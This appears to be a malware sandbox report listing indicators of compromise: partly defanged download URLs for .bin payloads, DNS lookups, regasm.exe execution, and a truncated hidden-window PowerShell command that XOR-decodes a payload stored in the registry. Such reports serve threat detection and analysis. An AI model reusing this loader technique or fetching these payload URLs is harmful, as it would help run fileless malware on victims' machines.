Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- http://jo#i.ru/VrwJwaat8gJ8GA.bin
- http://jo##.net/VrwJwaat8gJ8GA.bin
- http://dl#.#oxi.net/drive/2020/02/27/0039/1928/2619272/72/8d5e2fd612.bin
- DNS ASK jo#i.ru
- DNS ASK jo##.net
- DNS ASK dl#.#oxi.net
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $TKNYTsw='';$wApALsJlnV=(Get-ItemProperty HKCU:\/Software\/jobsxaSmI).LGDkqLyYhJBoP;for ($i=0;$i -lt $wApALsJlnV.Length;$i++){$wApALsJlnV[$i]=[byte]($wApALsJlnV[$i] -bxor 'tr1'[$i % 'tr1'.Lengt...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $TKNYTsw='';$wApALsJlnV=(Get-ItemProperty HKCU:\/Software\/jobsxaSmI).LGDkqLyYhJBoP;for ($i=0;$i -lt $wApALsJlnV.Length;$i++){$wApALsJlnV[$i]=[byte]($wApALsJlnV[$i] -bxor 'tr1'[$i % 'tr1'.Lengt...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'